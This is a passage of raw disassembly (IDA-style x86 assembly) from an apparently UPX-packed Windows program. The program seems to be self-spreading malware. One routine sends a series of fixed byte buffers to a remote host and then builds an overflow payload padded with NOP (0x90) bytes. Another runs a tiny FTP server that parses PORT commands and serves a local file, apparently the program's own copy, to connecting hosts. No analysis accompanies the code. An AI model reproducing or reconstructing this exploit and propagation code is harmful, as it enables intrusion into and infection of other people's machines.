push offset off_41A8CC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 0Ah
mov [ebp+var_1B78], eax
push 32h
push offset dword_41A860
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 32h
mov [ebp+var_1B78], eax
mov eax, [ebp+var_1B78]
mov [ebp+var_B6C], eax
mov eax, [ebp+var_1B78]
sub eax, 18h
mov [ebp+var_B64], eax
push [ebp+var_1B78]
lea eax, [ebp+var_B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410B36
jmp short locret_410B50
; ---------------------------------------------------------------------------
loc_410B36: ; CODE XREF: sub_410649+4E9�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call ds:dword_417248 ; recv
locret_410B50: ; CODE XREF: sub_410649+38�j
; sub_410649+A2�j ...
leave
retn
sub_410649 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B52 proc near ; DATA XREF: UPX1:0041CDE8�o
var_104C = byte ptr -104Ch
var_FC6 = byte ptr -0FC6h
var_BDE = byte ptr -0BDEh
var_B9E = byte ptr -0B9Eh
var_B7C = dword ptr -0B7Ch
var_B78 = byte ptr -0B78h
var_AF2 = byte ptr -0AF2h
var_88E = byte ptr -88Eh
var_882 = byte ptr -882h
var_85E = byte ptr -85Eh
var_852 = byte ptr -852h
var_82E = byte ptr -82Eh
var_80C = byte ptr -80Ch
var_7CC = byte ptr -7CCh
var_7C8 = byte ptr -7C8h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 104Ch
call sub_416BC0
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_204]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_20C], eax
cmp [ebp+var_20C], 0
jnz short loc_410BAF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BAF: ; CODE XREF: sub_410B52+56�j
push 89h
push offset dword_41AF50
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410BEF
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410BEF: ; CODE XREF: sub_410B52+96�j
push 0A8h
push offset dword_41AFDC
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C2F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C2F: ; CODE XREF: sub_410B52+D6�j
push 0DEh
push offset dword_41B088
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410C6F
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410C6F: ; CODE XREF: sub_410B52+116�j
movsx eax, [ebp+var_7CC]
sub eax, 30h
mov [ebp+var_208], al
movsx eax, [ebp+var_7C8]
sub eax, 30h
mov [ebp+var_4], al
push 3Eh
push offset dword_41B168
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410CC9
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410CC9: ; CODE XREF: sub_410B52+170�j
push 60h
push offset dword_41B1A8
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D06
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D06: ; CODE XREF: sub_410B52+1AD�j
push 0A0h
push offset dword_41B20C
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 2710h
push 600h
lea eax, [ebp+var_80C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_405443
add esp, 10h
test eax, eax
jnz short loc_410D46
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410D46: ; CODE XREF: sub_410B52+1ED�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz loc_410E71
movsx eax, [ebp+var_4]
cmp eax, 1
jnz loc_410E71
push 86h
push offset dword_41B2B0
lea eax, [ebp+var_B78]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_AF2]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0
mov eax, 264h
sub eax, [ebp+var_20C]
add eax, 60h
push eax
mov eax, [ebp+var_20C]
lea eax, [ebp+eax+var_AF2]
push eax
call sub_410F60
add esp, 0Ch
push 4
push offset dword_41B410
lea eax, [ebp+var_88E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_882]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_85E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset dword_41B408
lea eax, [ebp+var_852]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 20h
push offset dword_41B338
lea eax, [ebp+var_82E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 400h
call ds:dword_41709C ; Sleep
push 36Ah
lea eax, [ebp+var_B78]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
jmp locret_410F5E
; ---------------------------------------------------------------------------
loc_410E71: ; CODE XREF: sub_410B52+1FE�j
; sub_410B52+20B�j
movsx eax, [ebp+var_208]
cmp eax, 5
jnz short loc_410E85
movsx eax, [ebp+var_4]
test eax, eax
jz short loc_410E95
loc_410E85: ; CODE XREF: sub_410B52+329�j
movsx eax, [ebp+var_208]
cmp eax, 4
jnz locret_410F5E
loc_410E95: ; CODE XREF: sub_410B52+331�j
push 86h
push offset dword_41B35C
lea eax, [ebp+var_104C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E8h
sub eax, [ebp+var_20C]
push eax
push 90h
lea eax, [ebp+var_FC6]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push [ebp+var_20C]
lea eax, [ebp+var_204]
push eax
lea eax, [ebp+var_BDE]
sub eax, [ebp+var_20C]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
and [ebp+var_B7C], 0
jmp short loc_410F06
; ---------------------------------------------------------------------------
loc_410EF9: ; CODE XREF: sub_410B52+3DA�j
mov eax, [ebp+var_B7C]
inc eax
mov [ebp+var_B7C], eax
loc_410F06: ; CODE XREF: sub_410B52+3A5�j
cmp [ebp+var_B7C], 10h
jge short loc_410F2E
push 4
push offset dword_41B408
mov eax, [ebp+var_B7C]
lea eax, [ebp+eax*4+var_BDE]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
jmp short loc_410EF9
; ---------------------------------------------------------------------------
loc_410F2E: ; CODE XREF: sub_410B52+3BB�j
push 20h
push offset dword_41B3E4
lea eax, [ebp+var_B9E]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4CEh
lea eax, [ebp+var_104C]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
locret_410F5E: ; CODE XREF: sub_410B52+58�j
; sub_410B52+98�j ...
leave
retn
sub_410B52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F60 proc near ; CODE XREF: sub_410B52+265�p
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
cmp [ebp+arg_8], 0
jnz short loc_410FA4
and [ebp+var_4], 0
jmp short loc_410F79
; ---------------------------------------------------------------------------
loc_410F72: ; CODE XREF: sub_410F60+3D�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410F79: ; CODE XREF: sub_410F60+10�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_4]
jnb short loc_410F9F
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov al, ds:byte_41BB00[eax]
mov [ecx], al
jmp short loc_410F72
; ---------------------------------------------------------------------------
loc_410F9F: ; CODE XREF: sub_410F60+1F�j
jmp locret_41102D
; ---------------------------------------------------------------------------
loc_410FA4: ; CODE XREF: sub_410F60+A�j
cmp [ebp+arg_8], 7Fh
jnz short loc_410FDF
and [ebp+var_8], 0
jmp short loc_410FB7
; ---------------------------------------------------------------------------
loc_410FB0: ; CODE XREF: sub_410F60+7B�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_410FB7: ; CODE XREF: sub_410F60+4E�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jnb short loc_410FDD
push 5
push 0
call sub_4103F5
pop ecx
pop ecx
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov al, ds:byte_41BB00[eax]
mov [ecx], al
jmp short loc_410FB0
; ---------------------------------------------------------------------------
loc_410FDD: ; CODE XREF: sub_410F60+5D�j
jmp short locret_41102D
; ---------------------------------------------------------------------------
loc_410FDF: ; CODE XREF: sub_410F60+48�j
and [ebp+var_C], 0
loc_410FE3: ; CODE XREF: sub_410F60+AD�j
; sub_410F60+CB�j
mov eax, [ebp+var_C]
cmp eax, [ebp+arg_4]
jnb short locret_41102D
push 20h
push 0
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_10], al
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_8]
and ecx, ds:dword_41BB01[eax]
test ecx, ecx
jz short loc_41100F
jmp short loc_410FE3
; ---------------------------------------------------------------------------
loc_41100F: ; CODE XREF: sub_410F60+AB�j
movsx eax, [ebp+var_10]
imul eax, 5
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_C]
mov al, ds:byte_41BB00[eax]
mov [ecx], al
mov eax, [ebp+var_C]
inc eax
mov [ebp+var_C], eax
jmp short loc_410FE3
; ---------------------------------------------------------------------------
locret_41102D: ; CODE XREF: sub_410F60:loc_410F9F�j
; sub_410F60:loc_410FDD�j ...
leave
retn
sub_410F60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41102F proc near ; CODE XREF: sub_41113B+79B�p
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 210h
push 0EA60h
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4050EA
add esp, 10h
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411065
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_41106C
loc_411065: ; CODE XREF: sub_41102F+2B�j
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41106C: ; CODE XREF: sub_41102F+34�j
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_208], eax
cmp [ebp+var_208], 0
jnz short loc_41109F
push [ebp+var_204]
call sub_4053B1
pop ecx
xor eax, eax
jmp locret_411139
; ---------------------------------------------------------------------------
loc_41109F: ; CODE XREF: sub_41102F+5B�j
; sub_41102F:loc_41111C�j
mov eax, [ebp+var_208]
mov eax, [eax+0Ch]
and eax, 10h
test eax, eax
jnz short loc_41111E
push [ebp+var_208]
push 200h
push 1
lea eax, [ebp+var_200]
push eax
call sub_416B90 ; fread
add esp, 10h
mov [ebp+var_20C], eax
push [ebp+var_20C]
lea eax, [ebp+var_200]
push eax
push [ebp+var_204]
call sub_4053BF
add esp, 0Ch
mov [ebp+var_210], eax
mov eax, [ebp+var_20C]
cmp eax, [ebp+var_210]
jz short loc_41111C
push [ebp+var_204]
call sub_4053B1
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
xor eax, eax
jmp short locret_411139
; ---------------------------------------------------------------------------
loc_41111C: ; CODE XREF: sub_41102F+CF�j
jmp short loc_41109F
; ---------------------------------------------------------------------------
loc_41111E: ; CODE XREF: sub_41102F+7E�j
push [ebp+var_204]
call sub_40538D
pop ecx
push [ebp+var_208]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
locret_411139: ; CODE XREF: sub_41102F+38�j
; sub_41102F+6B�j ...
leave
retn
sub_41102F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41113B proc near ; DATA XREF: sub_411BBC+156�o
var_558 = dword ptr -558h
var_554 = dword ptr -554h
var_550 = dword ptr -550h
var_54C = dword ptr -54Ch
var_548 = dword ptr -548h
var_544 = dword ptr -544h
var_540 = byte ptr -540h
var_53C = byte ptr -53Ch
var_538 = byte ptr -538h
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_52C = dword ptr -52Ch
var_528 = dword ptr -528h
var_524 = dword ptr -524h
var_520 = dword ptr -520h
var_51C = dword ptr -51Ch
var_518 = byte ptr -518h
var_318 = byte ptr -318h
var_118 = dword ptr -118h
var_114 = byte ptr -114h
var_113 = byte ptr -113h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 558h
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
push offset dword_41C6B0
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
mov al, ds:byte_41DF00
mov [ebp+var_104], al
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
mov al, ds:byte_41DF00
mov [ebp+var_114], al
xor eax, eax
lea edi, [ebp+var_113]
stosd
stosb
and [ebp+var_4], 0
and [ebp+var_118], 0
and [ebp+var_108], 0
loc_4111CC: ; CODE XREF: sub_41113B+10C�j
; sub_41113B+1BD�j ...
push 0EA60h
push [ebp+var_10C]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jz loc_4119BA
push 200h
lea eax, [ebp+var_318]
push eax
push [ebp+var_10C]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_520], eax
cmp [ebp+var_520], 0
jz short loc_411218
cmp [ebp+var_520], 0FFFFFFFFh
jnz short loc_41121D
loc_411218: ; CODE XREF: sub_41113B+D2�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41121D: ; CODE XREF: sub_41113B+DB�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
lea eax, [ebp+var_318]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_528], eax
cmp [ebp+var_528], 0
jnz short loc_411249
jmp short loc_4111CC
; ---------------------------------------------------------------------------
loc_411249: ; CODE XREF: sub_41113B+10A�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_51C], eax
cmp [ebp+var_51C], 0
jnz short loc_411278
mov [ebp+var_51C], offset byte_41DF00
loc_411278: ; CODE XREF: sub_41113B+131�j
lea eax, [ebp+var_108]
push eax
push offset dword_41C6AC
push 0
call sub_40813C
add esp, 0Ch
push [ebp+var_528]
call sub_40ED38
pop ecx
mov [ebp+var_524], eax
mov eax, [ebp+var_524]
sub eax, ds:dword_41C6A0
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4112FD
mov [ebp+var_4], 1
push offset dword_41C698
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4112FD: ; CODE XREF: sub_41113B+178�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C68C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41135D
mov [ebp+var_118], 1
push offset dword_41C684
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41135D: ; CODE XREF: sub_41113B+1D5�j
cmp [ebp+var_4], 0
jz short loc_41136C
cmp [ebp+var_118], 0
jnz short loc_411371
loc_41136C: ; CODE XREF: sub_41113B+226�j
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411371: ; CODE XREF: sub_41113B+22F�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C678
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4113C7
push offset dword_41C670
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4113C7: ; CODE XREF: sub_41113B+249�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C664
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41141D
push offset dword_41C65C
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41141D: ; CODE XREF: sub_41113B+29F�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C654
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_411473
push offset dword_41C648
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411473: ; CODE XREF: sub_41113B+2F5�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C63C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4114C9
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4114C9: ; CODE XREF: sub_41113B+34B�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C628
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_41151F
push offset dword_41C620
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_41151F: ; CODE XREF: sub_41113B+3A1�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C614
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411622
lea eax, [ebp+var_534]
push eax
lea eax, [ebp+var_52C]
push eax
lea eax, [ebp+var_540]
push eax
lea eax, [ebp+var_53C]
push eax
lea eax, [ebp+var_538]
push eax
lea eax, [ebp+var_530]
push eax
push offset aUUUUUU ; "%u,%u,%u,%u,%u,%u"
push [ebp+var_51C]
call sub_416BA2 ; sscanf
add esp, 20h
movzx eax, [ebp+var_540]
push eax
movzx eax, [ebp+var_53C]
push eax
movzx eax, [ebp+var_538]
push eax
movzx eax, [ebp+var_530]
push eax
push offset dword_418A50
push 100h
lea eax, [ebp+var_104]
push eax
call sub_416BAE ; _snprintf
add esp, 1Ch
mov eax, [ebp+var_52C]
and eax, 0FFh
shl eax, 8
mov ecx, [ebp+var_534]
and ecx, 0FFh
or eax, ecx
push eax
push offset dword_418A60
push 6
lea eax, [ebp+var_114]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
push offset dword_41C634
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411622: ; CODE XREF: sub_41113B+3F7�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C5F4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_4116E9
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_548], eax
cmp [ebp+var_548], 0
jnz short loc_411660
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411660: ; CODE XREF: sub_41113B+51E�j
push 2
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_544], eax
push 0
push 0
push [ebp+var_548]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_548]
call sub_416B82 ; fclose
pop ecx
push [ebp+var_544]
push offset dword_41C5E8
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 10h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_4116E9: ; CODE XREF: sub_41113B+4FA�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C5DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411873
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 2710h
push 0
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_4050EA
add esp, 10h
mov [ebp+var_54C], eax
cmp [ebp+var_54C], 0
jz short loc_411773
cmp [ebp+var_54C], 0FFFFFFFFh
jnz short loc_411778
loc_411773: ; CODE XREF: sub_41113B+62D�j
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_411778: ; CODE XREF: sub_41113B+636�j
push offset aRb ; "rb"
push offset dword_41EBFC
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_554], eax
cmp [ebp+var_554], 0
jnz short loc_41179D
jmp loc_4119BA
; ---------------------------------------------------------------------------
loc_41179D: ; CODE XREF: sub_41113B+65B�j
push 2
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_550], eax
push 0
push 0
push [ebp+var_554]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_554]
call sub_416B82 ; fclose
pop ecx
push offset dword_41EBFC
push [ebp+var_550]
push offset aX32000Fh1024Ja ; "-x 3 2000 fh 1024 Jan 1 0:00 .\r\ndrwxr-x"...
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_54C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_54C]
call sub_40538D
pop ecx
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
jmp loc_4111CC
; ---------------------------------------------------------------------------
loc_411873: ; CODE XREF: sub_41113B+5C1�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C54C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_411969
push offset a150 ; "150 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_104]
push eax
call sub_41102F
pop ecx
pop ecx
test eax, eax
jz loc_411967
push offset dword_41C558
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push 1
push offset dword_41EBD8
call sub_409C88
pop ecx
pop ecx
inc eax
mov [ebp+var_558], eax
lea eax, [ebp+var_104]
push eax
push [ebp+var_558]
push offset aFtp_0 ; "ftp"
push offset unk_41C520
push offset dword_41DB88
call sub_40D4AB
add esp, 14h
push 3E8h
call ds:dword_41709C ; Sleep
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411967: ; CODE XREF: sub_41113B+7A4�j
jmp short loc_4119BA
; ---------------------------------------------------------------------------
loc_411969: ; CODE XREF: sub_41113B+74B�j
mov eax, [ebp+var_524]
sub eax, ds:dword_41C514
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_4119BA
push offset a221 ; "221 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
loc_4119BA: ; CODE XREF: sub_41113B+A5�j
; sub_41113B:loc_411218�j ...
push offset a231 ; "231 -\r\n"
push 200h
lea eax, [ebp+var_518]
push eax
call sub_416BAE ; _snprintf
add esp, 0Ch
lea eax, [ebp+var_518]
push eax
call sub_416B40 ; strlen
pop ecx
push eax
lea eax, [ebp+var_518]
push eax
push [ebp+var_10C]
call sub_4053BF
add esp, 0Ch
push [ebp+var_10C]
call sub_40538D
pop ecx
xor eax, eax
pop edi
leave
retn 4
sub_41113B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_411A09 proc near ; CODE XREF: sub_411BBC+90�p
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 204h
push 32h
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_411A29
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
loc_411A29: ; CODE XREF: sub_411A09+17�j
push 200h
lea eax, [ebp+var_200]
push eax
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
mov [ebp+var_204], eax
cmp [ebp+var_204], 0
jz short loc_411A58
cmp [ebp+var_204], 0FFFFFFFFh
jnz short loc_411A5F
loc_411A58: ; CODE XREF: sub_411A09+44�j
xor eax, eax
jmp locret_411BBA
; ---------------------------------------------------------------------------
